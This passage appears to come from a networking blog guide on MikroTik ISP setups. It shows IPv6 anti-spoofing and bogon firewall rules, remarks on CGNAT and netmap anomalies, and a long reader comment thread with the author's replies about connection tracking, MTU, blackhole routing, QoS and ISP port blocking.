add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=tcp
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=udp
#This is required for traffic whereby the SRC may be Link-local and the DST is GUA for BGP peers particuarly in IXPs#
add action=accept chain=prerouting comment="Accept all ICMPv6 traffic from BGP peers (Required for LL<>GUA packets)" icmp-options=!154:4-5 in-interface-list=WAN protocol=icmpv6 src-address-list=bgp_peers
add action=drop chain=prerouting comment="Drop invalids from WAN" dst-address-list="global_unicast_prefix(es)" in-interface-list=WAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="Drop forwarded invalids from WAN" dst-address-list=not_in_internet in-interface-list=WAN src-address-list="global_unicast_prefix(es)"
add action=drop chain=prerouting comment="Drop invalids from LAN" dst-address-list="global_unicast_prefix(es)" in-interface-list=LAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="Drop forwarded invalids from LAN" dst-address-list=not_in_internet in-interface-list=LAN src-address-list=lan_subnets
add action=accept chain=prerouting comment="defconf: enable for transparent firewall" disabled=yes
#Drop anything from your network going towards the public internet if source addresses does not match your allocated pools#
add action=drop chain=prerouting comment="Drop spoofed traffic from LAN going towards Global Unicast" dst-address-list="global_unicast_prefix(es)" in-interface-list=LAN src-address-list=!lan_subnets
add action=drop chain=prerouting comment="defconf: drop bogon IP's" src-address-list=bad_ipv6
add action=drop chain=prerouting comment="defconf: drop bogon IP's" dst-address-list=bad_ipv6
add action=drop chain=prerouting comment="defconf: drop packets with bad src ipv6" src-address-list=bad_src_ipv6
add action=drop chain=prerouting comment="defconf: drop packets with bad dst ipv6" dst-address-list=bad_dst_ipv6
add action=accept chain=prerouting comment="defconf: accept local multicast scope" dst-address=ff02::/16
add action=drop chain=prerouting comment="defconf: drop other multicast destinations" dst-address=ff00::/8
add action=drop chain=prerouting comment="defconf: drop bad UDP" port=0 protocol=udp
add action=drop chain=prerouting comment="defconf: drop bad TCP" port=0 protocol=tcp
add action=accept chain=prerouting comment="defconf: accept UDP traceroute" dst-address-type=local port=33434-33534 protocol=udp
add action=jump chain=prerouting comment="defconf: jump to ICMP chain" jump-target=icmpv6 protocol=icmpv6
add action=accept chain=prerouting comment="defconf: accept everything else from LAN" in-interface-list=LAN
add action=accept chain=prerouting comment="defconf: accept everything else from WAN" in-interface-list=WAN
add action=accept chain=prerouting comment="Accept local traffic to self" src-address-type=local
add action=drop chain=prerouting comment="defconf: drop the rest"
add action=drop chain=icmpv6 comment="Drop FMIPv6 HI + FMIPv6 HAck - Deprecated (RFC5568)" icmp-options=154:4-5 protocol=icmpv6
Firewall Explanation
I will keep this concise as stated earlier I suggest you study and understand how iptables function in general and study the packet flow to know what rule does what: With that being said, I will break it down into simpler points
• I used this and this as the source for building the base for the firewall
• MikroTik has ensured to conform to various RFCs and taken the efforts to not break any legitimate protocol/traffic
• IPv6 firewall rules are trickier and more complex, but rest assured that the rules in this article do not break any protocol/standard nor do they impact customer’s end-to-end reachability
• We are dropping spoofed traffic
• The RAW rules drop anything coming from WAN that’s spoofed (RFC 6890 addresses)
• The RAW rules drop anything coming from LAN that does not match your public prefixes/internal subnets (aka lan_subnets address list), meaning any spoofing traffic is dropped from exiting your network
• Here’s an APNIC blog post detailing more on this subject
• Next, we are dropping bad traffic such as TCP/UDP port 0 or bad TCP flags
• The filter rules are pretty self-explanatory
Strange Anomalies
These are some strange behaviours that I could not explain. If you have further information, please reach out to me.
1. NAT Leak
• For example, let’s say we CGNAT 100.64.0.0/24 to customers with 103.176.189.0/25. Now, it’s common sense that anything WAN bound will have a source IP belonging to the /25 on the other end of the NAT. But nope, this isn’t always the case. What I have observed is, sometimes (meaning all the time if you have thousands of customers), the source IP would be the CGNAT subnet and the destination IP would be public, hence it “escapes” from the NAT engine.
• This behaviour is NOT exclusive to MikroTik. I have observed the same thing on Ubuntu 20.04/Debian based distros, where the source IP is the NAT subnet and it escapes to the WAN interface with the destination IP being real-live public IPs
• Solution: We just drop anything coming from the BNG that’s not public using the Edge Router, this is already taken care of in my configuration above, you just need to follow the instructions
• I have been unable to find documentation or bug reports on this behaviour
2. Netmap vs Src Nat
• Publicly available documentation suggests simple definitions for both
Src NAT = 1:Many binding
Netmap = 1:1 binding
• But for whatever reason, when using src NAT as the action for a public prefix, it keeps on changing the “NATted” public IP and hence the source IP on the WAN for the customers. This results in traffic breaking or triggering DDoS protection on sites like Cloudflare protected ones
• And for whatever reason, even though Netmap is meant for 1:1, it works for 1:Many bindings and it does not result in the constant changing of source IP for the customers
• I have not found any technical information on why these behaviours occur or why netmap even works in the first place for 1:Many bindings
Published inISPNetworking
113 Comments
1. Rupam Kumar Sharma Rupam Kumar Sharma
Such a detailed address of the issues that is so important while in implementation…
Thanks
2. Hi Daryll, well done!!!, it was the key for fix a problem I had been triyng to fix in a customer (ISP).
I would like you could read my problem: https://forum.mikrotik.com/viewtopic.php?f=2&t=176378
I repeat, That problem its fixed now, thanks of you!.
I used the following command of your article (with a little modifications):
/ip firewall nat
add action=netmap chain=srcnat comment=”NETMAP PPPoE” out-interface=sfp1-Internet src-address-list=Clientes_NAT to-addresses=PUBLIC/32
I don’t understand what is the difference using “srcnat action masquerade” (witch it wasn’t working) and using “Netmap” (witch for shure it runned perfectly fine at the first moment that I put it). I want to learn/understand why this way is working.
Thanks a lot.
Regards from Argentina
• For the NAT Leak issue, it mostly looks like speculation on that thread in my opinion. No factual/documented information yet, but I’ll keep an eye on it.
3. Stefan Müller Stefan Müller
unfortunately, that is the case. When the conclusion are a bit more solid I will email support anyway, may they resolve the mystery
• Well, it depends on when you last visited the site? 🙂
Added:
QoS/Bandwidth management suggestion, IPv6 for BNGs with PPPoE, IPv6 tweaks, IPv6 firewalling for both Edge and BNGs, slightly tweaked the IPv4 firewall rules for both, MTU section is finalised, CGNAT section is finalised. That’s about it I think.
4. that is true :), it was end if July.
I received an notification from WordPress yesterday that a new post was added.
As there was not any, I guessed it was due to the update of the blog.
I don’t know if notification are sent as well if the blog is updated
5. Jeff Jeff
First off, thank you so much for this! Im currently in the middle of a major network upgrade for our ISP and this post has been absolute gold. Ive learned a ton.
Anyways, I have a quick question about the Firewall DDoS protection jump chain.
add action=jump chain=forward comment=”Jump to DDoS detection” connection-state=new in-interface-list=WAN jump-target=detect-ddos
Why is it only on the forward chain and not the input chain as well? The Mikrotik help page has it this way as well (forward chain only) but Ive been running it on the input and forward chains for a while now. I havent had any issues but im curious if there is there any particular reason why you do not have DDoS on input chain?
• Input chain means the router itself:
1. There’s nothing it will do when the DDoS traffic is hitting the router, the link will still choke. You need to have proper DDoS mitigation from/with your upstream
2. I’ve tested it for fun on the input chain and it ended up breaking traffic that’s destined towards the router itself such as DNS lookups.
Hence there’s no point in applying those rules in the input chain. They are in the forward chain in order to protect your downstream users.
6. Jeff Jeff
Hey Daryll, got another question for you.
I noticed that when disabling connection tracking on the Edge Router, the Mikrotik puts an auto RAW rule with action=no track for the prerouting and output at the very bottom of the RAW rule table.
But with the prerouting action = no track being at the bottom, no packets are hitting that rule. So I assume the firewall is still tracking connections as they pass the RAW rules above it.
The Mikrotik will not allow me to drag that rule to the top, but I can drag my other RAW rules below it and I can then see packets hitting that prerouting rule. But when I reboot the router, it places those rules back at the bottom again?
Are you seeing the same thing? Or are your prerouting action= no track rules stay at the top? Im on long-term v6.48.6 btw
• I believe MikroTik does conn_track disable by the means of no tracking via the raw table, but more likely than not, what you’re seeing is a bug. As long as the packets are hitting your other raw rules, it isn’t an issue. Check the connection tracking tab, if there’s nothing there, then we know for sure, connection tracking is disabled. And as long as you’re seeing the expected routing performance throughput, we can also safely assume connection tracking was disabled.
7. Jeff Jeff
So I just tried deleting all the rules and making sure I disable the connection tracking before input RAW rule set again. The Mikrotik still places those no track rules at the end of the rule set after reboot again. Is this a bug or is this a misunderstanding on my part?
• I just tested it out on my personal router running v7.1.1 as I wrote this, I’m unable to replicate what you saw after rebooting. I’m 100% sure it’s a bug.
I’d suggest a netinstall once with the latest long-term and ensure /system routerboard firmware is also running the latest long-term (rebooted twice for it to work).
8. Jeff Jeff
No I definitely have connections there. The reason I rebooted my router was to see if those connections would disappear after moving the rules. Ill submit bug to Mikrotik support Thanks for the clarification
9. Jeff Jeff
Yea, its a 6.48.6 bug. Im seeing it on 4 of my CCR1036’s and I duplicated it on my home RB4011. Ill be submitting this to support. Thanks again!
10. Jeff Jeff
Question: If you disable connection tracking, is there any real difference between a Filter rule vs a RAW rule? I get wanting to keep all FW rules to an absolute minimum but if connection tracking is disabled, then from a performance perspective, it would be the same other than now a filter rule gives you more flexibilty in terms of being able to block at the input or forward chain where as a RAW rule is more generic.
For example, if I still wanted to keep an ACL whitelist for input chain to router for security reasons, my rule would look like this.
/ip firewall filter
add action=drop chain=input comment=”Drop ALL except from TRUSTED” src-address-list=!TRUSTED
• First, a caveat, the filter table cannot work without connection tracking, it is by definition stateful and hence needs state tracking.
Edge/Border routers are not supposed to have connection tracking enabled. They are routers meant to route and forward traffic inter-AS as seamlessly as possible and not filter nor act as a firewall. The most we can do on the edge of a network is drop bogon traffic as we know for a fact, they should never enter a network, to begin with, and serve no functional purpose. (I will update the IPv6 raw table to drop some headers on the edge as per 2022 practices that serve have no functional purpose as well)
If you enable conn_track on the edge, the performance impact will be visible downstream to the customers and your eBGP router will just randomly reboot once customers saturate the conn_track table. On top of that, you’d be creating a butterfly effect of ugly NAT keep-alive or just keep-alive traffic to now choke not only the BNGs but also the eBGP routers and impact performance even further.
The raw table gives us the ability to still firewall without the performance impact of stateful tracking. In other words, it’s stateless firewalling.
So if you want to ACL access to the router, you can still use RAW like:
/ip firewall raw
add action=drop chain=prerouting comment=”Drop ALL except from TRUSTED” src-address-list=!TRUSTED dst-address-list=[Your list containing IPs of the interface/router etc]
However, although this is the most optimal option available on MikroTik, it is not the currently accepted standards or best practices, as the world moves to eBPF/XDP (while MikroTik is playing catch-up for the last 10 years):
https://blog.cloudflare.com/how-to-drop-10-million-packets/
You can also find in the above article some data that shows no-track (conn_track disabled) outperforms conn_track enabled.
At the end of the day, if a high-performance Edge/Border router is what a network needs, it’s certainly something MikroTik cannot deliver at this point in time.
11. JJT JJT
Under your IPv6 raw rules, is there supposed to be a !lan_subnets drop rule for Edge Router? I dont see it.
• Create it if I missed it on the rules. Drop anything that’s not the public prefixes allocated to your network.
Edit: fe80::/10 should also be a member of lan_subnets to avoid breaking link-local.
• I’ve tweaked the !lan raw IPv6 rules. Now it makes more sense and removes the need for forward chain rule on BNG and simplifies it for the edge router.
However, should IANA ever make changes to the IPv6 blocks, you’d need to update this manually.
/ip fi raw
add action=drop chain=prerouting comment="Drop spoofed traffic from LAN going towards Global Unicast" dst-address=2000::/3 in-interface-list=LAN src-address-list=!lan_subnets
12. Jeff Jeff
Ahhhh….so to reinforce your point….and regarding that earlier bug we found, I noticed that those FW Raw ‘no track’ rules disappear inside the Raw table when I disabled my lone FW input rule with connection tracking disabled. All makes sense now.
13. Jeff Jeff
I see you have updates but its difficult to know what they are and where. Would it be possible to give some kind of changelog and/or highlight improvements/changes you have made?
• I would need a systematic approach or maybe some WP plugin that can do the job. Do you know any? Writing a manual changelog for documentation this big is too much of a tedious task really.
14. Jeff Jeff
Yea, I hear ya, just throwing the idea out there. The bold explanations do help quite a bit. The BGP Optimization section is a nice addition. I learn more each time I go through it.
• Help spread the word, and share this article with other network operators and engineers, it benefits the ecosystem if everyone deployed best practices end-to-end.
If you know somebody who can convert this guide into a Cisco and Juniper equivalent, that’d be great too.
15. Jeff Jeff
Absolutely! Myself and another poster (who introduced me to this blog) on r/mikrotik on Reddit as well as the Mikrotik forums take every chance we get to share this with others. Keep up the excellent work. Its very much appreciated!
BTW, you have some minor typos you might wanna fix when you get a chance:
The address list “global_unicast_prefix(es)” in your IPv6 raw rule doesnt paste properly in terminal
add action=drop chain=prerouting comment=”Drop invalids from WAN” dst-address-list=global_unicast_prefix(es) in-interface-list=WAN src-address-list=not_in_internet
Had to drop the parenthesis inside the address list name to get it to paste in terminally correctly like this “global_unicast_prefixes”
16. Jeff Jeff
And one last thing:
I see you’re doing away with the IPv4 ICMP raw filtering. Do you no longer see a benefit to filtering by ICMP types? Also, I do not see any further ICMP accept rules. Is that somehow accepted in the implied “accept everything else from LAN/WAN” rules?
• Yes. The kernel by default rates limit ICMP/ICMPv6 anyways and hence those rules are redundant and a waste of CPU. All ICMP/ICMPv6 is accepted, let the kernel handle rate limiting.
Don’t miss the new RFC6890 section 🙂
17. Jeff Jeff
Yea I see the RFC6890 blackhole section, I think that part is awesome. I was doing that with my public subnet but using it for the RFC6890 is an excellent idea.
In regards to ICMP, I get the rate limits but what about the allowed ICMP types? Arent there some deprecated and malicious ICMP types that should not be allowed? Or I guess in this case, you only allow specific ICMP types?
• Yeah, I will edit the RFC6890 section and say “Inject these rules into any router/L3 switch that has a routing table” – Makes perfect sense if you really think about it.
There are deprecated ICMP types, yes, but I haven’t seen any hard evidence of them doing any damage if they aren’t blocked, and even if somehow they could, again they are rate limited. So why waste CPU power anyway. As long as everything else is properly configured, the network should be secure.
You’d need ICMP filtering maybe for DoD/DARPA stuff or something, but eh, not at ISP level in my opinion. I’ve removed all ICMP filtering in my own network and my home routers as well.
18. Jeff Jeff
Previously, I couldnt believe how much garbage this rule was collecting.
#This rule should be redudant as we are now routing RFC6890 to blackhole directly and hence I am commenting it out#
#add action=drop chain=forward comment=”Drop tries to reach not public addresses from LAN” dst-address-list=not_in_internet in-interface-list=LAN out-interface-list=WAN#
It was every single router regardless of type of network, there was always tons of garbage. And I couldnt believe there was that much of it, everywhere. My guess is random misconfigurations and/or crap device code.
I then implemented the blackhole routes and WOW….its mostly all gone now.
And I say “mostly” because there’s one small caveat I noticed. One of my sites has a failover which is a double NAT through another provider. With the failover WAN IP being in the 192.168.x.x subnet, bandit packets are still hitting the above rule. Which makes sense if you think about it. Its a minor issue, not that big a deal, especially on a site of its kind. But thought it was worth mentioning.
• It’s not just misconfiguration. For unknown reasons my personal Windows 11, Debian Based, iOS, macOS devices all originate such packets. I never found an explanation.
That’s expected behaviour in your specific site:
More specific route is always preferred over less specific route. I’d leave it be, not much harm that could happen there.
19. Anav Anav
Hi Daryll. In terms of netmap. The way I understand it in my laymens terms is that if one has a subnet of fixed public IPs being netmapped to a larger group of private IPs, what happens is what I call a slice or jump pattern of assignment. Initially I thought Okay for a 256 block of public iPs, the first private 256 private IPs are assigned tot he first public IP. Wrong, Its the 1,257,513 etc private IPs that get assigned to the public IP. So its fair to say that the same block of private IPs (via slices or jumps) always gets the same public IP. Hope that helps.
• I already knew the netmaps ensure 1:1 mapping, i.e 1.1.1.1 netmapped to 100.64.0.7 will persistently stay the same until reboot or similar. Which is perfect for P2P/STUN/ICE/WebRTC/TURN. But the question is: Why does netmap public/24 works with private/8 for example? The Linux Man page suggests it shouldn’t.
Edit: Wait a minute, this is “Anav” from the MikroTik forums, ain’t it? I’m leaving just going to leave this here.
20. Johan Johan
Hello
Thats a great work
I have a question, what is the real purpose of loose tcp tracking?
Is it other tracking with the original connection track ?
• With PPPoE, it is easier. But I think you would need to give persistent IPv6 PD assignments (which you should be doing anyways), and then Queue on a per prefix basis where a customer is behind each of them.
But if you’re going the DHCPv6 route – With Tik, there’s a problem. It can only hand out PD, but not addresses. Which means the customer will receive a /56 or shorter prefixes for LAN, but their WAN (Link prefix) will be null, unless you use a /64 on a per interface basis with SLAAC and configure the CPE to pick it up via SLAAC for WAN. But even then you’ll have a problem. SLAAC in Tik is not managed via RADIUS – So you won’t know which customer was assigned which address and so on.
I’d suggest talking with stubarea51 consulting firm and let me know if you find a solution. I’ll add it to my guide.
Matter of fact if you’re already doing DHCPv4, let me know the whole procedure (via emails), I’ll add that to my guide too – Like how did you set up DHCP Option 82, MAC binding, security. Did you use VRFs maybe? To repeat RFC1918 for different VLANs etc?
21. Steven Steven
Hi Daryll
Thanks for this article
I have an idea about routing loop, What about add RFC6890 in routing rules with lookup only table, ip rout here only take this table to blackhole ?
• The whole point is to route less specifics to blackhole. Which is applicable to both RFC680 blocks and also public pools.
What is lookup supposed to serve? I don’t see the need to possibly (if I understood you) create a blackhole only table?
22. Steven Steven
Here is an example
/routing table
add disabled=no fib name=Blackhole
/routing rule
add action=lookup-only-in-table disabled=no dst-address=192.168.0.0/16 table=Blackhole
add action=lookup-only-in-table disabled=no dst-address=10.0.0.0/8 table=Blackhole
add action=lookup-only-in-table disabled=no dst-address=172.16.0.0/12 table=Blackhole
add action=lookup-only-in-table disabled=no dst-address=255.255.255.255/32 interface=BNG table=Blackhole
/ip route
add blackhole comment=Blackhole disabled=no distance=1 dst-address=0.0.0.0/0 gateway=”” pref-src=”” routing-table=Blackhole scope=30 suppress-hw-offload=no \
target-scope=10
• I don’t see any reason to use a separate table. If anything this would probably increase CPU usage as now it has to manually lookup for each subnet.
23. Johannes Johannes
Hi Daryll,
First of all: thank you so much for this extensive, well documented piece of work!
I’m used to building networks with cisco and juniper equipment but fell in love with mikrotik stuff, built my own little ipv6 only AS with it and am now in the process of optimizing basic stuff. That’s when I arrived here – and rethought my firewalling from the ground up thanks to your great work! So thanks again!
I do have one question though: Running ROS7 and changed from stateful firewall filter rules to modified versions of your raw filters. While this did the trick to get rid of IPv4 connection tracking, I still have “living” entries in ipv6/firewall/connections – without any filter rules. And there is no ipv6/firewall/connection/tracking submenu to disable it manually. Am I missing something or is it not possible to turn off connection tracking for IPv6?
Second, more general question: you seem to have updated this blog entry on June 29th. Is there some kind of changelog I could refer to for your changes? 😉 Otherwise I might have to download this entry to a local git repo to stay up to date 🙂
Thanks again for your terrific work and best regards from Germany,
Johannes
• IPv6 connection tracking is automatically disabled on both ROSv6 and ROSv7 if there is nothing in /ipv6 firewall filter or mangle or nat(66). If it’s still tracking, then I suggest you contact MikroTik support, as that sounds like a bug.
Minor typos were fixed on June 29th. I cannot keep changelogs of such a large documentation, but if you know of any WordPress plugin that can automate the job of a change log, then please by all means, do share, I’ll make use of it.
I’m glad my guide was of use to your network. Furthermore, I hope you follow all the BCPs and BCOPs for your network to ensure a fully conforming and homogenous network!
24. Mehhmet van der Loyer Mehhmet van der Loyer
Are you positive you didn’t get this the wrong way round? Loose tracking = off, i.e. strict tracking enabled, will cause already established connections not picked up?
Can you please expand on this?
I would expect this setting to correspond to the netfilter loose tracking mode which has less sanity checks around NEW state packets, penultimate FIN packets, etc.
25. while this was very good, sfq does not fix bufferbloat. fq_codel/cake do. the test you used measures fq not queue depth (aqm). try a packet capture on that test.
• Hi Dave
A few points to note and consider:
1. This article dates back to 2021 back on RouterOS v6 when fq_codel/CAKE did not exist on MikroTik
2. I did not claim that SFQ “fixes” bufferbloat, only that it reduced
3. I do not have the time to test QoS any further, if you have hard data/configuration used on a BNG device serving a minimum of at least 200 users, feel free to share the config, screenshots, and guidelines. I will consider adding that to the article and credit such a section to your name.
Furthermore, I’m not a specialist in QoS, so I’m not sure what you mean by “fq not queue depth (aqm)”, but at the time of testing, the device had around 1k customers with at least minimum 1Gig traffic going in/out.
26. There was a lot of uptake of fq_codel after it arrived in mikrotik. Very long thread over here about sfq vs cake in particular:
https://forum.mikrotik.com/viewtopic.php?t=179307#p885613
As for a guide, I will try to find someone deploying. Basically on cpe we are seeing cake ack-filter bandwidth XMbit diffserv4 on a simple queue on the up, and I don’t really know what is used on the bng side (seeing preseem/libreqos/cambium/
Apologies for misconstruing your statement. FQ is what the tests measure you used, queue depth (managed via AQM), is bufferbloat. FQ bypasses the queue-building flows.
• Yes, I know MikroTik added fq_codel/CAKE etc in RouterOS v7, but back in 2021, RouterOS v7 was not production-ready and hence was not tested. I lack the time to implement it on my own personal network as well, but hopefully, I’ll get to it eventually.
Most network operators in APAC that are using MikroTik a lot for BNGs, just use whatever MikroTik defaults come with for the queuing algorithm, so SFQ, PFIFO etc. They do not spend in-depth testing and research into what method works best for their network, at least on BNG level – This was the main reason for SFQ as I observed it “just works” even if not perfect. There’s a psychological factor at play, details here.
Ah, you mean, the “bufferbloat” test from DSLReports? Well, I can update that with a more proper web-based bufferbloat test site, sure, but I’ll need the “guide” though (config, data, screenshots, explanation to the reader etc).
Feel free to email me directly for further discussion or message via my Telegram (both are on the left sidebar at the top).
27. Mr_Black Mr_Black
Hi Daryll
i had an idea about nat.
Why you add not_in_internet at dst-address
is not enough to add the same src-address in dst like this example ?
/ip firewall nat add
action=netmap chain=srcnat comment=”CGNAT rule” dst-address-list=!cgnat_subnets ipsec-policy=out,none out-interface-list=WAN src-address-list=cgnat_subnetsto-addresses=103.176.189.0/25
• not_in_internet address list contains all the RFC6890 subnets including the CGNAT subnet range in aggregated format.
cgnat_subnets only contains either supernets or just the /10 subnet.
That is why we need not_in_internet.
28. Jeff Jeff
In your Edge Router Firewall section, I notice you’re now fasttracking stateless traffic.
#Filter rules for FastTracking stateless traffic#
/ip firewall filter
add action=fasttrack-connection chain=input
add action=fasttrack-connection chain=forward
add action=fasttrack-connection chain=output
But since connection tracking is disabled on Edge Routers, isnt all traffic in essence Fast Tracked by default? It sounds kind of redundant to me but im obviously missing something.
• FastTrack never works “by default”, FastPath does under limited conditions, for which if you’re using firewall address lists, FastPath is out the window as well.
And hence for this reason, we manually “FastTrack” the traffic through the rules above. But I recently found it’s logically more efficient to do this in the mangle table and cleaner. I’ll update the article itself, but here’s the snippet:
/ip firewall mangle
add action=fasttrack-connection chain=prerouting
add action=fasttrack-connection chain=output
29. Singu Singu
Hi Daryll.. I’ve followed your guide in MTU about configuring RFC 4638. I’ve set the MTU and MRU to 1500 in the PPPoE Server of Mikrotik, but I can only achieve a maximum of 1492 MTU. I’ve double checked already the MTU of OLT and Mikrotik with the OLT MTU set to maximum value of 2000 and Mikrotik router MTU of 1500 and L2 MTU of 2000. I’m not sure what’s going on as for why is it not working. The ONUs are Huawei HG8145V5 or maybe the modem is not capable of RFC 4638
• The BNG L3 MTU should be 2000 on the physical port to match OLT L2/L3 MTU 2000. The customer MikroTik router L2 MTU maxed out but L3 will be 2000 to match OLT. ONUs should be bridge mode, but some ONUs even in bridge mode don’t support baby jumbo frames nor RFC4638. Also if you have switches between BNG and OLT, they all need proper MTU config. Follow MTU section sample.
Migrate to DHCPv4/v6 to avoid MTU problems.
30. Stefan Müller Stefan Müller
Hey Daryll,
I have just noted that you took both rules from here.
Is it just copy&paste (like me 🙂 ) or any reason to have both?
If I’m not mistaken, anything that could be caught by the second rule is caught by the first rule anyway.
add action=return chain=detect-ddos dst-limit=50,50,src-and-dst-addresses/10s
add action=return chain=detect-ddos dst-limit=50,50,src-and-dst-addresses/10s protocol=tcp tcp-flags=syn,ack
• MikroTik copied it from here.
The second rule is definitely redundant, however with that being said, I’m planning to remove these two configuration parameters completely from the guide.
The reasoning being such configuration only makes sense for SOHO/Minuscule networks no bigger than my home lab 🙂
For production networks we should be using FastNetMon for detection + escalation and a third-party DDoS scrubber. The rules above do absolutely nothing when you’re hit with a real DDoS and more than likely block legitimate traffic in large networks.
31. Tony Da Silva Tony Da Silva
I have a strange issue – maybe somebody has an idea .
I have a CCR2004 with PPPOE set up. 10gbps connection to the internet and 10gbps link to local peering.
There is a 10gig connection at the DC between the fibre network operator and the CCR2004
Home has a 250mbps fibre link connected via ONT to the fibre network operator.
On client side, when doing download on cable, full 250mbps is achieved. When trying 5G wifi you get 150mbps download and 250mbps upload. There is no wifi interference at all. (Local downloads on wifi (onsite NAS) is achieving download speed of 700mbps)
Strangely, when downloading from a IPv6 address (on wifi), we get full 250mbps. It looks like something is causing poor performance on ipv4. Client CPE MTU is set to 1492 and on CCR2004 the MaxMTU and MAX MRU is left blank in the PPPOE Service config.
• Client CPE MTU is set to 1492 and on CCR2004 the MaxMTU and MAX MRU is left blank in the PPPOE Service config.
Why is MTU not configured end-to-end correctly, including RFC4638, as per the guide? Fix the MTU configuration.
Next, make sure CGNAT is correctly configured, routed to blackhole as per the guide. Reboot CGNAT box during off hours and test again.
Additionally, it sounds like you’re using a single CCR2004 for both edge routing and customer downstream delegation, stateful-ness on the edge is a bad idea to begin with, also explained in the guide.
• Tony Da Silva Tony Da Silva
Hello
Client end only goes to 1492 so should I rather set MAX MTU and MRU to 1492 on the BNG as well?
Dont use CGNAT for the clients as they have static IPv4. Blackhole routes set up for those IP4 ranges
• No. MTU/MRU should always be 1500 on the PPPoE server, and the underlay MTU for the physical Ethernet and SFP cages would be jumbo frames, along with the VLAN L3 MTU and also any VPLS interfaces you may have.
The underlay network should carry jumbo frames, end-to-end, network wide.
Client doesn’t matter, even if it’s limited to only 1492. RFC4638 will do its job via the “PPP-Max-Payload” tag in the PPPoE negotiation procedure.
Feel free to reach out to our public community here.
32. Mario Martinez Mario Martinez
My ISP actively uses the MTU of 1492, either as AS7303 or its upstream AS262589. Some sites in Brazil are dropping on 1500. Is one of the two filtering ICMP, or is there a equipment set on 1492, damaging PMTUD?
The common user will never complain about this, as some modems in NAT are hardcoded on 1490. i.imgur.com/aM3LwDV.jpeg
• Ask your ISP(s) to deploy RFC4638, point them to this guide. I can’t help you to change the mind of your ISP, you and other customers in your country need to raise complaints.
• There is a long-standing debate on uRPF vs rp-filter.
1. rp-filter only exists in the Linux kernel and OSes that uses the Linux kernel for networking control/data plane, it does not exist on major vendors like Cisco, Juniper etc who uses custom code for both the control and data plane.
2. uRPF is not officially supported on the Linux kernel, but it is supported on major vendors.
RFC 3704 only defines RPF, but never defined rp-filter:
https://en.wikipedia.org/wiki/Reverse-path_forwarding#Filtering_vs._forwarding
Regardless of the difference, it would be nice to have feasible mode rp-filter (or uRPF) with proper CPU/memory optimisations to avoid issues.
Even Juniper doesn’t support feasible mode as of now.
• My point is to have the possibility of disabling rp-filter per interface.
On a BNG that has a single uplink PTP, no issues on activating rp-filter=strict
But on a BNG that has more the one uplinks, one to CDN router, other one to CGNAT, other to BGP-Border-A, another to BGP-Border-B, assimetry certainly will occur.
And because os those just a few interfaces we need to disable or put in loose mode the global cenário of the box(all interfaces, including subscribers).
So…
“Hey Mikrotik, allow-me to disable per interface the rp-filter.
Just that.
• What about some coordinated effort from several guys to “help” them to understand the need?
Should have no hope on that?
• If you’re looking for a campaign leader or group to teach MikroTik staff on the importance of per-interface rp-filter (or anything else of the sort), I’m afraid I’m not the right person for the job nor do I share an interest in such objectives.
I have a lot on my plate already, I don’t have the mental capacity, time nor schedule to go chasing after MikroTik to implement a 20-year-old feature.
33. About DST-NATing packets that reach public IPs to a loopback.
You mentioned that you used this solution to fix routing loops.
To be frank, I don’t see that methodology as the prettier. ha-ha.
But I’ve already used something close to that.
The motivations were different! Geo-location!
Beyond all the cadastral efforts, latency triangulation has a high impact on the geolocation databases. I can say that by experience.
Hosting a ripe atlas probe and/or anchor will accelerate very much the organic corrections of geolocation database.
But it(probe) needs to be able to ping and traceroute to the IPs.
And this is the part I would like to listen to your opinion.
Between our guys, we reached two possible solutions:
a- DST-NATing everything that comes to Public IP Addresses to an IP on a loopback.
b- Putting all the 8, 16, 32 /32 public IPs addresses on a loopback.
To be sincere, I consider both methods ugly… But both works.
My reference until now make me think that “b” is a bit better.
We can create a dedicated loopback to that and do some work with firewall rules matching interface to avoid interaction with other packets flowing.
Have an opinion about that?
• 1. I am planning to remove/update the dst-nat loopback method, these days I prefer blackhole routing of the CGNAT public range on each CGNAT box, this means zero loops.
2. I may still enable dst-nat loopback hack only for ICMP, this is for fun, bells and whistles, to allow customers and measurement probes to be able to properly ping your CGNAT public range. Not mandatory, but “cool”.
For Geo-location, you should be following the current standards based on RFC8805. Use this tool to verify your inetnum and inet6num objects are complying with RFC8805. You can test the tool with my IP ranges to see how it works.
Watch this video by Massimo Candela from NTT on the subject.
• Yep! I know pretty much geofeeds.
But it still doesn’t have too much traction.
P.S.: Unfortunately, most of our customers depend on renting IPv4 addresses.
Yep… This is a shit. But is the intermediary solution until buying their own blocks.
And, dealing with that kind of issues very frequently, we created a sequence of doings that usually solve issues with geolocations and CDN distributions involving(non exhaustive) things like Geofeed.csv + Whois remark, GeoIDX on IRR, Internal Recursive DNS Server IP Addresses sharing same AS-Path than the eyeballs IP Blocks…
But, in fact, the most efective action is related to Latency triangulation.
Atlas probes, NLNOG RING, and others…
And responding to ping, traceroute, and some other probing that comes from them.
And exactly because of this probes I asked you about it.
Thanks anyway.
• Geofeed and the method I described here works well. Within 15 days, all major GeoIP DB providers will show up-to-date location information. Whenever I received a new IP block, within 15 days, it’s fully-updated on the Geo providers.
I’ve spoken to one of the CEO/Founder of a GeoIP DB company, and they agreed my method is valid and effective and shared they’ve received many emails of people who followed my template/steps.
34. Ronald Chan Ronald Chan
This document is gold, I couldn’t ask for more I hope a lot of documents on the internet will be like this, because of this document I was able to polish my Proof-of-concept dual stack deployment and the management is happy with the result, our POC is now out of beta stage and soon will be launched with selected PoP in our network.
35. Hi Daryll,
Does this still works???
In my Case we have ROS6.49.8
/ipv6 dhcp-server binding;
:foreach i in=[find server~”pppoe”] do={
make-static $i;
set $i comment=[get $i server];
set $i server=all;
}
36. “Blocks inbound ports based on the false logic of “protecting” the customer
Port blocking does nothing to improve security, it only breaks legitimate traffic such as apps or games that use various methods for VoIP”
I strongly disagree. We have a filter on the access-router of our POPs.
To filter a well known list of port, inbound only, for example, 22,23,80,443,1723 to protect the management part of the customer’s routers.
We open on request by the client, and we have an outgoing filter to remote 135,137-139 for example… and we match a lot of traffic.
• That is a stupid practice, and if I was subjected to such treatment by an ISP, I’m taking it to court and in many countries, the court will be in consumer’s favour in such cases.
It’s the customer’s responsibility/job to filter their routers, hosts etc to protect their network on their side, with their firewall filters from the public internet—Why is the ISP playing firewall here? What legal justification do you have to block those ports, when customers paid for their IPv4 addresses and IPv6 PDs?
